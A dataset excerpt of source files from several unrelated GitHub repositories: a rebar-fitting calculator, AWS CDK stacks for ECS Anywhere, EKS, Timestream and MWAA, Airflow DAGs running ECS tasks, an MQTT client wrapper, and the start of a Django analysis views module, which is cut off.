metadata | text
---|---
{
"source": "0916dhkim/SeniorDesign",
"score": 3
} |
#### File: 0916dhkim/SeniorDesign/rebar.py
```python
from math import sqrt, pi
diameter = {}
area = {}
min_num = 3
max_num = 11
for ii in range(min_num, 8+1):
diameter[ii] = ii/8.000
area[ii] = pi * diameter[ii]**2 / 4
for ii in range(9, max_num+1):
area[ii] = ((ii-1)/8) ** 2
diameter[ii] = 2 * sqrt(area[ii]/pi)
def fit_bars(area_req, width, aggregate_size):
count = {}
fail = {'bar': max_num, 'count': 0}
# Find the required number of bars to achieve required area.
for bar_num in range(min_num, max_num+1):
req_num = int(area_req // area[bar_num] + 1)
count[bar_num] = req_num
# Find the configuration with the least reinforcement area.
ret = fail
for bar_num in range(min_num, max_num+1):
if count[bar_num] < 2:
count[bar_num] = 2
if width >= diameter[bar_num]*count[bar_num]+aggregate_size*(count[bar_num]-1):
            if ret['count'] == 0 or area[ret['bar']]*ret['count'] > area[bar_num]*count[bar_num]:
ret = {'bar': bar_num, 'count': count[bar_num]}
return ret
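# Hedged usage sketch (added, not part of the original file): the numbers below
# are illustrative, assuming area_req is in square inches, width in inches and
# aggregate_size is the required clear spacing between bars in inches.
if __name__ == "__main__":
    # Lightest layout giving at least 1.2 in^2 of steel in a 12 in wide section
    # with 1 in spacing between bars.
    layout = fit_bars(area_req=1.2, width=12.0, aggregate_size=1.0)
    print("Use %d No. %d bars" % (layout['count'], layout['bar']))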
``` |
{
"source": "092975/spykesim",
"score": 3
} |
#### File: spykesim/spykesim/test.py
```python
import numpy as np
from joblib import Parallel, delayed, cpu_count
import editsim
def su(a, i):
    return a[i].sum()
def execute():
    print("test")
    dims = (100000, 4)
    x = editsim.createSharedNumpyArray(dims)
    x[:] = np.random.rand(dims[0], dims[1])
    res = Parallel(n_jobs=cpu_count())(delayed(su)(x, i) for i in range(dims[0]))
    print(res)
execute()
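# Added note (not in the original test): if editsim is unavailable, a plain
# NumPy array gives an equivalent smoke test, since joblib memory-maps large
# array arguments for its worker processes anyway (see Parallel's max_nbytes).
def execute_plain_numpy():
    dims = (100000, 4)
    x = np.random.rand(*dims)
    res = Parallel(n_jobs=cpu_count())(delayed(su)(x, i) for i in range(dims[0]))
    print(len(res))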
``` |
{
"source": "094459/beltech-multiarchitecture",
"score": 2
} |
#### File: multi-arch/ecs_anywhere/ecs_anywhere_pipe.py
```python
from aws_cdk import (
aws_iam as iam,
aws_ecs as ecs,
aws_ecr as ecr,
aws_codecommit as codecommit,
aws_codebuild as codebuild,
aws_codepipeline as codepipeline,
aws_codepipeline_actions as codepipeline_actions,
core
)
class EcsAnywherePipeStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, vpc, props, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
        # This CDK application uses existing ECR and CodeCommit repositories
        # You could easily change this to create them with CDK instead
# select ECR
ecr_repo = ecr.Repository.from_repository_name(self, "springbootecrrepo", repository_name=f"{props['ecr-repo']}")
# select code repo
code = codecommit.Repository.from_repository_name(self, "CodeRep", repository_name=f"{props['code-repo']}")
codecommit.CfnRepository.CodeProperty.branch_name="main"
core.CfnOutput(self,"CodeCommitOutput", value=code.repository_clone_url_http)
# create codecommit build steps
        # the referenced files are in the code-repo (armbuild/amdbuild/postbuild)
# from the root folder in the repository
# If you update those (locations/filenames) you will need to update these
arm_build = codebuild.PipelineProject(self, "ARMBuild",
build_spec=codebuild.BuildSpec.from_source_filename("pipeline/ecs-pipeline/armbuild.yml"),
environment=codebuild.BuildEnvironment(
build_image=codebuild.LinuxBuildImage.AMAZON_LINUX_2_ARM,
privileged=True),
environment_variables=self.get_build_env_vars(ecr_repo))
self.add_role_access_to_build(arm_build)
amd_build = codebuild.PipelineProject(self, "AMDBuild",
build_spec=codebuild.BuildSpec.from_source_filename("pipeline/ecs-pipeline/amdbuild.yml"),
environment=codebuild.BuildEnvironment(
build_image=codebuild.LinuxBuildImage.AMAZON_LINUX_2_3,
privileged=True),
environment_variables=self.get_build_env_vars(ecr_repo))
self.add_role_access_to_build(amd_build)
post_build = codebuild.PipelineProject(self, "PostBuild",
build_spec=codebuild.BuildSpec.from_source_filename("pipeline/ecs-pipeline/post_build.yml"),
environment=codebuild.BuildEnvironment(
build_image=codebuild.LinuxBuildImage.AMAZON_LINUX_2_3,
privileged=True),
environment_variables=self.get_build_env_vars(ecr_repo))
self.add_role_access_to_build(post_build)
# create pipeline
source_output = codepipeline.Artifact()
arm_build_output = codepipeline.Artifact("ARMBuildOutput")
amd_build_output = codepipeline.Artifact("AMDBuildOutput")
post_build_output = codepipeline.Artifact("PostBuildOutput")
codepipeline.Pipeline(
self,
"ECSAnyWherePipeline",
pipeline_name="ECSAnyWhere",
stages=[
codepipeline.StageProps(stage_name="Source",
actions=[
codepipeline_actions.CodeCommitSourceAction(
action_name="CodeCommit_Source",
repository=code,
branch='main',
output=source_output)]),
codepipeline.StageProps(stage_name="Build",
actions=[
codepipeline_actions.CodeBuildAction(
action_name="ARM_Build",
project=arm_build,
input=source_output,
outputs=[arm_build_output]),
codepipeline_actions.CodeBuildAction(
action_name="AMD_Build",
project=amd_build,
input=source_output,
outputs=[amd_build_output]),
]),
codepipeline.StageProps(stage_name="PostBuild",
actions=[
codepipeline_actions.CodeBuildAction(
action_name="Post_Build",
project=post_build,
input=source_output,
outputs=[post_build_output])
]),
])
def add_role_access_to_build(self, build):
build.role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name("AmazonEC2ContainerRegistryFullAccess"))
build.role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name("AmazonSSMReadOnlyAccess"))
build.role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name("AWSCodeDeployRoleForECS"))
build.add_to_role_policy(iam.PolicyStatement(actions=["kms:Decrypt", "kms:GenerateDataKey*"], resources=["*"]))
build.add_to_role_policy(iam.PolicyStatement(actions=[
"ec2:DescribeAvailabilityZones",
"ecs:DescribeClusters",
"ecs:DescribeServices",
"ecs:CreateTaskSet",
"ecs:UpdateService*",
"ecs:DeleteTaskSet",
"ssm:PutParameter",
"ecs:DescribeTaskDefinition",
"ecs:RegisterTaskDefinition"], resources=["*"]))
# We need to grab some Parameter Store variables
def get_build_env_vars(self, ecr_repo):
return {
"REPOSITORY_URI": codebuild.BuildEnvironmentVariable(value=ecr_repo.repository_uri),
"ECS_CLUSTER": codebuild.BuildEnvironmentVariable(
value="/demo/ecsanywhere/clustername",
type=codebuild.BuildEnvironmentVariableType.PARAMETER_STORE),
"ECS_SERVICE": codebuild.BuildEnvironmentVariable(
value="/demo/ecsanywhere/servicename",
type=codebuild.BuildEnvironmentVariableType.PARAMETER_STORE),
"ECS_SN": codebuild.BuildEnvironmentVariable(
value="/demo/ecsanywhere/shortcn",
type=codebuild.BuildEnvironmentVariableType.PARAMETER_STORE),
}
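# Hedged wiring sketch (added, not in the original file): how this stack could
# be synthesized on its own. The repository names in props are placeholders,
# and vpc is passed as None because the constructor shown above does not use it.
if __name__ == "__main__":
    app = core.App()
    EcsAnywherePipeStack(
        app, "ecs-anywhere-pipe",
        vpc=None,
        props={"ecr-repo": "my-ecr-repo", "code-repo": "my-code-repo"},
    )
    app.synth()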
``` |
{
"source": "094459/blog-multi-arch-springboot",
"score": 2
} |
#### File: ecs-anywhere/ecs_anywhere/ecs_anywhere_repo.py
```python
from aws_cdk import (
aws_iam as iam,
aws_ecs as ecs,
aws_ecr as ecr,
aws_ec2 as ec2,
aws_ssm as ssm,
aws_logs as log,
aws_autoscaling as autoscaling,
aws_elasticloadbalancingv2 as elbv2,
core
)
from aws_cdk.aws_ecr_assets import DockerImageAsset
class EcsAnywhereLBStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, vpc, props, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
# Create Application Load Balancer and Target Group
# which configures the target IP of the remote Pi
# and sets up the necessary security groups
local_lb_security_group = ec2.SecurityGroup(
self,
"Load Balance internal Springboot http access",
vpc=vpc
)
local_lb_security_group.add_ingress_rule(
ec2.Peer.any_ipv4(),
ec2.Port.tcp(80)
)
local_lb_security_group.add_egress_rule(
ec2.Peer.ipv4(f"{props['mydcinternalcidr']}"),
ec2.Port.tcp(8080)
)
lb = elbv2.ApplicationLoadBalancer(
self,
"LB",
vpc=vpc,
internet_facing=True,
security_group=local_lb_security_group
)
listener = lb.add_listener(
"Listener",
port=80,
open=True
)
remotepi = elbv2.IpTarget(
f"{props['home-pi']}",
port=8080,
availability_zone="all")
listener.add_targets(
"Target",
port=8080,
targets=[remotepi]
)
core.CfnOutput(
self,
id="PiRemoteLB",
value=lb.load_balancer_dns_name,
description="DNS of the Remote Pi Load Balancer"
)
``` |
{
"source": "094459/blogpost-airflow-hybrid",
"score": 2
} |
#### File: ecs-cdk/ecs-anywhere/app.py
```python
from aws_cdk import core
from ecs_anywhere.ecs_anywhere_vpc import EcsAnywhereVPCStack
from ecs_anywhere.ecs_anywhere_taskdef import EcsAnywhereTaskDefStack
env_EU=core.Environment(region="eu-west-2", account="704533066374")
props = {
'ecsclustername':'hybrid-airflow',
'ecr-repo': 'hybrid-airflow',
'image-tag' : 'airflw',
'awsvpccidr':'10.0.0.0/16',
's3':'ricsue-airflow-hybrid'
}
app = core.App()
mydc_vpc = EcsAnywhereVPCStack(
scope=app,
id="ecs-anywhere-vpc",
env=env_EU,
props=props
)
mydc_ecs_cicd = EcsAnywhereTaskDefStack(
scope=app,
id="ecs-anywhere-taskdef",
env=env_EU,
vpc=mydc_vpc.vpc,
props=props
)
app.synth()
```
#### File: ecs-anywhere/ecs_anywhere/ecs_anywhere_vpc.py
```python
from aws_cdk import (
aws_iam as iam,
aws_ec2 as ec2,
core
)
class EcsAnywhereVPCStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, props, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
# Create VPC networking environment
# Public subnet/ "private"(isolated) subnet
# Customer Gateway and Virtual Private Gateway
# Site to Site VPN Connection
self.vpc = ec2.Vpc(
self,
id="mydc-vpn-vpc",
cidr=f"{props['awsvpccidr']}",
nat_gateways=1,
subnet_configuration=[
ec2.SubnetConfiguration(
name="public", cidr_mask=24,
reserved=False, subnet_type=ec2.SubnetType.PUBLIC),
ec2.SubnetConfiguration(
name="private", cidr_mask=24,
#reserved=False, subnet_type=ec2.SubnetType.ISOLATED)
reserved=False, subnet_type=ec2.SubnetType.PRIVATE)
],
max_azs=2,
enable_dns_hostnames=True,
enable_dns_support=True,
vpn_gateway=False
)
core.CfnOutput(
self,
id="VPCId",
value=self.vpc.vpc_id,
description="VPC ID",
export_name=f"{self.region}:{self.account}:{self.stack_name}:vpc-id"
)
```
#### File: blogpost-airflow-hybrid/dag/ecs-hybrid-boto3.py
```python
from airflow import DAG
from datetime import datetime, timedelta
from airflow.operators.python import PythonOperator
import boto3
import json
default_args = {
'owner': 'ubuntu',
'start_date': datetime(2019, 8, 14),
'retry_delay': timedelta(seconds=60*60)
}
# Grab variables - future improvement
#region
#taskRoleArn
#executionRoleArn
#family
#awslogs-group
#awslogs-stream-prefix
#task-name
#container-image
#command
#cluster
client = boto3.client("ecs", region_name="eu-west-2")
# Function that will take variables and create our new ECS Task Definition
def create_task(ti):
response = client.register_task_definition(
containerDefinitions=[
{
"name": "airflow-hybrid-boto3",
"image": "public.ecr.aws/xxx/xxx:latest",
"cpu": 0,
"portMappings": [],
"essential": True,
"environment": [],
"mountPoints": [],
"volumesFrom": [],
"command": ["ricsue-airflow-hybrid","period1/temp.csv", "select * from customers WHERE location = \"Spain\"", "rds-airflow-hybrid","eu-west-2"],
"logConfiguration": {
"logDriver": "awslogs",
"options": {
"awslogs-group": "/ecs/test-external",
"awslogs-region": "eu-west-2",
"awslogs-stream-prefix": "ecs"
}
}
}
],
taskRoleArn="arn:aws:iam::xxx:role/ecsTaskExecutionRole",
executionRoleArn="arn:aws:iam::xxxx:role/ecsTaskExecutionRole",
family= "test-external",
networkMode="bridge",
requiresCompatibilities= [
"EXTERNAL"
],
cpu= "256",
memory= "512")
    # we now need to store the version of the new task so we can ensure idempotency
new_taskdef=json.dumps(response['taskDefinition']['revision'], indent=4, default=str)
print("TaskDef is now at :" + str(new_taskdef))
return new_taskdef
# Function that will run our ECS Task
def run_task(ti):
#new_taskdef=ti.xcom_pull(key='new_taskdef', task_ids=['create_taskdef'][0])
new_taskdef=ti.xcom_pull(task_ids=['create_taskdef'][0])
print("TaskDef passed is :" + str(new_taskdef))
response2 = client.run_task(
cluster='test-hybrid',
count=1,
launchType='EXTERNAL',
taskDefinition='test-external:{taskdef}'.format(taskdef=new_taskdef)
)
with DAG('airflow_ecsanywhere_boto3', catchup=False, default_args=default_args, schedule_interval=None) as dag:
first_task=PythonOperator(task_id='create_taskdef', python_callable=create_task, provide_context=True, dag=dag)
second_task=PythonOperator(task_id='run_task', python_callable=run_task, provide_context=True, dag=dag)
first_task >> second_task
```
#### File: blogpost-airflow-hybrid/dag/ecs-hybrid.py
```python
from airflow import DAG
from datetime import datetime, timedelta
from airflow.providers.amazon.aws.operators.ecs import ECSOperator
from airflow.operators.python import PythonOperator
import boto3
import json
default_args = {
'owner': 'ubuntu',
'start_date': datetime(2019, 8, 14),
'retry_delay': timedelta(seconds=60*60)
}
# Function that will take variables and create our new ECS Task Definition
def create_task(ti):
client = boto3.client("ecs", region_name="eu-west-2")
response = client.register_task_definition(
containerDefinitions=[
{
"name": "airflow-hybrid-demo",
"image": "public.ecr.aws/xx/xx:latest",
"cpu": 0,
"portMappings": [],
"essential": True,
"environment": [],
"mountPoints": [],
"volumesFrom": [],
"command": ["ricsue-airflow-hybrid","period1/hq-data.csv", "select * from customers WHERE location = \"Spain\"", "rds-airflow-hybrid","eu-west-2"],
"logConfiguration": {
"logDriver": "awslogs",
"options": {
"awslogs-group": "/ecs/test-external",
"awslogs-region": "eu-west-2",
"awslogs-stream-prefix": "ecs"
}
}
}
],
taskRoleArn="arn:aws:iam::xx:role/ecsTaskExecutionRole",
executionRoleArn="arn:aws:iam::xx:role/ecsTaskExecutionRole",
family= "test-external",
networkMode="host",
requiresCompatibilities= [
"EXTERNAL"
],
cpu= "256",
memory= "512")
    # we now need to store the version of the new task so we can ensure idempotency
new_taskdef=json.dumps(response['taskDefinition']['revision'], indent=4, default=str)
print("TaskDef is now at :" + str(new_taskdef))
return new_taskdef
with DAG('hybrid_airflow_dag_test', catchup=False, default_args=default_args, schedule_interval=None) as dag:
create_taskdef = PythonOperator(
task_id='create_taskdef',
provide_context=True,
python_callable=create_task,
dag=dag
)
cloudquery = ECSOperator(
task_id="cloudquery",
dag=dag,
cluster="test-hybrid",
task_definition="test-external",
overrides={ },
launch_type="EC2",
awslogs_group="/ecs/test-external",
awslogs_stream_prefix="ecs"
)
# switch between these to change between remote and local MySQL
# "command" : [ "ricsue-airflow-hybrid","period1/region-data.csv", "select * from customers WHERE location = \"Poland\"", "rds-airflow-hybrid","eu-west-2" ]}
# "command" : [ "ricsue-airflow-hybrid","period1/region-data.csv", "select * from regionalcustomers WHERE country = \"Poland\"", "localmysql-airflow-hybrid","eu-west-2" ]}
remotequery = ECSOperator(
task_id="remotequery",
dag=dag,
cluster="test-hybrid",
task_definition="test-external",
launch_type="EXTERNAL",
overrides={ "containerOverrides": [
{
"name": "airflow-hybrid-demo",
"command" : [ "ricsue-airflow-hybrid","period1/region-data.csv", "select * from regionalcustomers WHERE country = \"Poland\"", "localmysql-airflow-hybrid","eu-west-2" ]}
] },
awslogs_group="/ecs/test-external",
awslogs_stream_prefix="ecs",
)
create_taskdef >> cloudquery
create_taskdef >> remotequery
```
#### File: docker/app/db-details.py
```python
import boto3
import json
def get_secret():
secret_name = "rds-airflow-hybrid"
region_name = "eu-west-2"
# Create a Secrets Manager client
session = boto3.session.Session()
client = session.client(
service_name='secretsmanager',
region_name=region_name
)
get_secret_value_response = client.get_secret_value(SecretId=secret_name)
info=json.loads(get_secret_value_response['SecretString'])
    pw = info['password']
    un = info['username']
    hs = info['host']
    db = info['database']
    return un, pw, hs, db
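# Hedged usage sketch (added, not in the original file): assumes the secret
# holds exactly the four keys read above; only non-sensitive fields are printed.
if __name__ == "__main__":
    username, password, host, database = get_secret()
    print(f"Will connect to database '{database}' on {host} as {username}")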
```
#### File: blogpost-airflow-hybrid/scripts/create-ecs-task.py
```python
import boto3
import json
client = boto3.client("ecs", region_name="eu-west-2")
def create_task():
response = client.register_task_definition(
containerDefinitions=[
{
"name": "airflow-hybrid-boto3",
"image": "public.ecr.aws/a4b5h6u6/beachgeek:latest",
"cpu": 0,
"portMappings": [],
"essential": True,
"environment": [],
"mountPoints": [],
"volumesFrom": [],
"command": ["ricsue-airflow-hybrid","period1/temp.csv", "select * from customers WHERE location = \"Spain\"", "rds-airflow-hybrid","eu-west-2"],
"logConfiguration": {
"logDriver": "awslogs",
"options": {
"awslogs-group": "/ecs/test-external",
"awslogs-region": "eu-west-2",
"awslogs-stream-prefix": "ecs"
}
}
}
],
taskRoleArn="arn:aws:iam::704533066374:role/ecsTaskExecutionRole",
executionRoleArn="arn:aws:iam::704533066374:role/ecsTaskExecutionRole",
family= "test-external",
networkMode="HOST",
requiresCompatibilities= [
"EXTERNAL"
],
cpu= "256",
memory= "512")
``` |
{
"source": "094459/dev-con",
"score": 2
} |
#### File: mwaa-redshift/mwaa_redshift/mwaa_redshift_vpc.py
```python
from aws_cdk import core
import aws_cdk.aws_ec2 as ec2
class MwaaRedshiftVPC(core.Stack):
def __init__(self, scope: core.Construct, id: str, props, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
# Create VPC network
self.vpc = ec2.Vpc(
self,
id="MWAA-RedShiftCluster-VPC",
cidr="10.192.0.0/16",
nat_gateways=1,
subnet_configuration=[
ec2.SubnetConfiguration(
name="public", cidr_mask=20,
reserved=False, subnet_type=ec2.SubnetType.PUBLIC),
ec2.SubnetConfiguration(
name="private", cidr_mask=20,
reserved=False, subnet_type=ec2.SubnetType.PRIVATE)
],
max_azs=2,
enable_dns_hostnames=True,
enable_dns_support=True
)
core.CfnOutput(
self,
id="VPCId",
value=self.vpc.vpc_id,
description="VPC ID",
export_name=f"{self.region}:{self.account}:{self.stack_name}:vpc-id"
)
``` |
{
"source": "094459/devday-graviton",
"score": 2
} |
#### File: cdk/backend/backend_stack.py
```python
from aws_cdk import (core, aws_lambda as lambda_,
aws_s3 as s3, aws_eks as eks,
aws_iam as iam, aws_ec2 as ec2)
import json
class BackendStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
# create new vpc
vpc = ec2.Vpc(self, "VPC")
# create eks
self.eks = self.create_eks(vpc)
def create_eks(self, vpc):
# create eks cluster with amd nodegroup
cluster = eks.Cluster(self, "EKS", vpc=vpc, version=eks.KubernetesVersion.V1_18,
default_capacity_instance=ec2.InstanceType("m5.large"),
default_capacity=1)
# add arm/graviton nodegroup
cluster.add_nodegroup_capacity("graviton", desired_size=1,
instance_type=ec2.InstanceType("m6g.large"),
nodegroup_name="graviton", node_role=cluster.default_nodegroup.role)
# add secret access to eks node role
cluster.default_nodegroup.role.add_managed_policy(
iam.ManagedPolicy.from_aws_managed_policy_name("SecretsManagerReadWrite"))
# create service account
sa = self.add_service_account(cluster=cluster, name="aws-load-balancer-controller",
namespace="kube-system")
# add helm charts
ingress = cluster.add_helm_chart("LBIngress", chart="aws-load-balancer-controller",
release="aws-load-balancer-controller",
repository="https://aws.github.io/eks-charts",
namespace="kube-system", values={
"clusterName": cluster.cluster_name,
"serviceAccount.name": "aws-load-balancer-controller",
"serviceAccount.create": "false"
})
return cluster
def add_service_account(self, cluster, name, namespace):
"""
workaround to add helm role to service account
"""
# create role
conditions = core.CfnJson(self, 'ConditionJson',
value = {
"%s:aud" % cluster.cluster_open_id_connect_issuer : "sts.amazonaws.com",
"%s:sub" % cluster.cluster_open_id_connect_issuer : "system:serviceaccount:%s:%s" % (namespace, name),
},
)
principal = iam.OpenIdConnectPrincipal(cluster.open_id_connect_provider).with_conditions({
"StringEquals": conditions,
})
role = iam.Role(self, 'ServiceAccountRole', assumed_by=principal)
# create policy for the service account
statements = []
with open('backend/iam_policy.json') as f:
data = json.load(f)
for s in data["Statement"]:
statements.append(iam.PolicyStatement.from_json(s))
policy = iam.Policy(self, "LBControllerPolicy", statements=statements)
policy.attach_to_role(role)
return eks.KubernetesManifest(self, "ServiceAccount", cluster=cluster,
manifest=[{
"apiVersion": "v1",
"kind": "ServiceAccount",
"metadata": {
"name": name,
"namespace": namespace ,
"labels": {
"app.kubernetes.io/name": name,
"app.kubernetes.io/managed-by": "Helm",
},
"annotations": {
"eks.amazonaws.com/role-arn": role.role_arn,
"meta.helm.sh/release-name": name,
"meta.helm.sh/release-namespace": namespace,
},
},
}],
);
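# Hedged wiring sketch (added, not in the original file): synthesize this stack
# on its own. The stack id is a placeholder, and backend/iam_policy.json must
# exist next to the app for add_service_account() to load its policy.
if __name__ == "__main__":
    app = core.App()
    BackendStack(app, "backend")
    app.synth()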
``` |
{
"source": "094459/time-series-and-data-lakes",
"score": 2
} |
#### File: cdk/from_kds_to_timestream/from_kds_to_timestream.py
```python
from aws_cdk import (
aws_iam as iam,
aws_kinesis as kinesis,
aws_lambda as lambda_,
aws_lambda_event_sources as lambda_event_sources,
aws_timestream as timestream,
core
)
class FromKdsToTimestream(core.Construct):
def __init__(self, scope: core.Construct, construct_id: str,
stream: kinesis.Stream, ts_db: timestream.CfnDatabase, ts_table: timestream.CfnTable,
**kwargs) -> None:
super().__init__(scope, construct_id, **kwargs)
# Load all records in the Input Stream into the Raw Time Series Table - AWS Lambda Function
load_data_fn = lambda_.Function(
self, "LoadRawDataFn",
runtime=lambda_.Runtime.PYTHON_3_8,
code=lambda_.Code.from_asset("load_data_fn"),
handler="app.lambda_handler",
environment={
"TIMESTREAM_DATABASE": ts_db.ref,
"TIMESTREAM_TABLE": ts_table.attr_name
}
)
# Lambda Function permission to write to the Raw Time Series Table
load_data_fn.add_to_role_policy(
iam.PolicyStatement(
actions=[
"timestream:WriteRecords",
],
effect=iam.Effect.ALLOW,
resources=[
f"{ts_table.attr_arn}"
],
)
)
# Lambda function permissions to describe Timestream endpoints
load_data_fn.add_to_role_policy(
iam.PolicyStatement(
actions=[
"timestream:DescribeEndpoints"
],
effect=iam.Effect.ALLOW,
resources=["*"],
)
)
# To send Input Stream records to the Lambda function
load_data_fn.add_event_source(
lambda_event_sources.KinesisEventSource(
stream,
starting_position=lambda_.StartingPosition.TRIM_HORIZON,
retry_attempts=2
)
)
```
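The construct above wires its Lambda to the `load_data_fn` asset with handler `app.lambda_handler`, but that handler is not included in this excerpt. Below is a minimal, hypothetical sketch of what such a handler could look like: it decodes the base64 Kinesis payloads and writes them to the table named by the environment variables the construct sets. The payload field names (`sensor_id`, `value`) are assumptions for illustration, not taken from the repository.
```python
import base64
import json
import os
import time

import boto3

# Environment variables injected by the CDK construct above.
TIMESTREAM_DATABASE = os.environ["TIMESTREAM_DATABASE"]
TIMESTREAM_TABLE = os.environ["TIMESTREAM_TABLE"]

write_client = boto3.client("timestream-write")


def lambda_handler(event, context):
    records = []
    for record in event.get("Records", []):
        # Kinesis delivers each payload base64-encoded.
        payload = json.loads(base64.b64decode(record["kinesis"]["data"]))
        # "sensor_id" and "value" are assumed field names for illustration.
        records.append({
            "Dimensions": [{"Name": "sensor_id", "Value": str(payload.get("sensor_id", "unknown"))}],
            "MeasureName": "value",
            "MeasureValue": str(payload.get("value", 0)),
            "MeasureValueType": "DOUBLE",
            "Time": str(int(time.time() * 1000)),
            "TimeUnit": "MILLISECONDS",
        })
    if records:
        write_client.write_records(
            DatabaseName=TIMESTREAM_DATABASE,
            TableName=TIMESTREAM_TABLE,
            Records=records,
        )
    return {"written": len(records)}
```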
#### File: tests/unit/test_time_series_and_data_lakes_stack.py
```python
import json
import pytest
from aws_cdk import core
from time_series_and_data_lakes.time_series_and_data_lakes_stack import TimeSeriesAndDataLakesStack
def get_template():
app = core.App()
TimeSeriesAndDataLakesStack(app, "time-series-and-data-lakes")
return json.dumps(app.synth().get_stack("time-series-and-data-lakes").template)
def test_sqs_queue_created():
assert("AWS::SQS::Queue" in get_template())
def test_sns_topic_created():
assert("AWS::SNS::Topic" in get_template())
```
#### File: mwaa-cdk/mwaa_cdk/deploy_files.py
```python
from aws_cdk import core
import aws_cdk.aws_ec2 as ec2
import aws_cdk.aws_s3 as s3
import aws_cdk.aws_s3_deployment as s3deploy
import aws_cdk.aws_iam as iam
class MwaaCdkStackDeployFiles(core.Stack):
def __init__(self, scope: core.Construct, id: str, vpc, mwaa_props, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
# Create MWAA S3 Bucket and upload local dags
dags_bucket = s3.Bucket(
self,
"mwaa-dags",
bucket_name=f"{mwaa_props['dagss3location'].lower()}",
versioned=True,
block_public_access=s3.BlockPublicAccess.BLOCK_ALL
)
dags = s3deploy.BucketDeployment(self, "DeployDAG",
sources=[s3deploy.Source.asset("./dags")],
destination_bucket=dags_bucket,
destination_key_prefix="dags",
prune=False,
retain_on_delete=False
)
# This uploads a requirements.txt file in the requirements
# folder. If not needed, you can comment this out
dagreqs = s3deploy.BucketDeployment(self, "DeployRequirements",
sources=[s3deploy.Source.asset("./requirements")],
destination_bucket=dags_bucket,
destination_key_prefix="requirements",
prune=False,
retain_on_delete=False
)
``` |
{
"source": "0954517662/NEWPY",
"score": 3
} |
#### File: NEWPY/build/anto.py
```python
from antolib import AntoCommon
import paho.mqtt.client as mqtt
client = mqtt.Client()
class Anto():
def __init__(self, user, key, thing):
self.user = user
self.key = key
self.thing = thing
self.mqtt = Mqtt(user, key, thing)
client.username_pw_set(self.user, self.key)
client.connect('service.anto.io', 1883, 60)
#print('Created anto object!')
def getVersion(self):
return AntoCommon.ANTO_VER
def sub(self, channel):
#print('Subscribed to: %s' % channel)
client.subscribe('channel/%s/%s/%s' % (self.user, self.thing, channel))
def pub(self, channel, msg):
print(('Publish \'' + str(msg) + '\' to: ' + str(channel)))
client.publish('channel/%s/%s/%s' % (self.user, self.thing, channel), msg)
def loop(self, loopFunction):
client.loop_start()
while(1):
loopFunction()
class Mqtt():
def __init__(self, user, key, thing):
self.user = user
self.key = key
self.thing = thing
def connect(self):
if hasattr(self, 'onConnectedCB'):
client.on_connect = self.onConnect
if hasattr(self, 'onDisconnectedCB'):
client.on_disconnect = self.onDisconnectedCB
if hasattr(self, 'onPublishedCB'):
client.on_publish = self.onPublishedCB
if hasattr(self, 'onDataCB'):
client.on_message = self.on_message
client.username_pw_set(self.user, self.key)
client.connect('service.anto.io', 1883, 60)
#print('Connected!')
def onConnect(self, client, userdata, flags, rc):
self.onConnectedCB()
def onConnected(self, callback):
self.onConnectedCB = callback
def onDisconnected(self, callback):
self.onDisconnectedCB = callback
def onData(self, callback):
self.onDataCB = callback
def on_message(self, mosq, obj, msg):
topic = msg.topic.split('/')[3]
# send topic and msg to callback
self.onDataCB(topic, msg.payload)
def onPublished(self, callback):
self.onPublishedCB = callback
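# Hedged usage sketch (added, not in the original file): user, key, thing and
# channel names are placeholders for real anto.io credentials.
if __name__ == "__main__":
    import time
    anto = Anto(user="my-user", key="my-api-key", thing="my-thing")
    anto.sub("temperature")

    def publish_loop():
        anto.pub("temperature", 25)
        time.sleep(5)

    anto.loop(publish_loop)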
``` |
{
"source": "097475/hansberger",
"score": 2
} |
#### File: hansberger/analysis/views.py
```python
import numpy
import json
from itertools import chain
from django.shortcuts import redirect
from django.http import HttpResponse
from django_downloadview import VirtualDownloadView
from django.core.files.base import ContentFile
from django.shortcuts import get_object_or_404, render
from django.urls import reverse_lazy
from django.db.transaction import non_atomic_requests
from django.utils.decorators import method_decorator
from django.views.generic import (
View,
CreateView,
DeleteView,
DetailView,
ListView,
)
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from .models import (
Analysis,
FiltrationAnalysis,
MapperAnalysis,
Window,
FiltrationWindow,
MapperWindow,
Bottleneck,
)
from research.models import Research
from .forms import (
SourceChoiceForm,
FiltrationAnalysisCreationForm_Dataset,
FiltrationAnalysisCreationForm_Precomputed,
MapperAnalysisCreationForm_Dataset,
MapperAnalysisCreationForm_Precomputed,
AnalysisBottleneckCreationForm,
WindowBottleneckCreationForm
)
form_dict = {
'filtration_analysis': {
'precomputed': FiltrationAnalysisCreationForm_Precomputed,
'dataset': FiltrationAnalysisCreationForm_Dataset
},
'mapper_analysis': {
'precomputed': MapperAnalysisCreationForm_Precomputed,
'dataset': MapperAnalysisCreationForm_Dataset
}
}
def SourceChoice(request, research_slug):
research = get_object_or_404(Research, slug=research_slug)
# if this is a POST request we need to process the form data
if request.method == 'POST':
# create a form instance and populate it with data from the request:
form = SourceChoiceForm(request.POST)
# check whether it's valid:
if form.is_valid():
cleaned_data = form.cleaned_data
analysis = cleaned_data.get("analysis")
source = cleaned_data.get("source")
if analysis == 'filtration_analysis':
return redirect('analysis:filtrationanalysis-create', form=source, research_slug=research.slug)
elif analysis == 'mapper_analysis':
return redirect('analysis:mapperanalysis-create', form=source, research_slug=research.slug)
# if a GET (or any other method) we'll create a blank form
else:
form = SourceChoiceForm()
return render(request, 'analysis/analysis_source_choice.html', {'form': form, 'research': research})
class AnalysisDetailView(View):
def get(self, request, *args, **kwargs):
my_analysis = (FiltrationAnalysis.objects.filter(
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
).first()
or
MapperAnalysis.objects.filter(
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
).first())
if isinstance(my_analysis, FiltrationAnalysis):
return render(request, 'analysis/filtrationanalysis_detail.html', context={'analysis': my_analysis,
'homology': range(my_analysis.max_homology_dimension + 1)})
elif isinstance(my_analysis, MapperAnalysis):
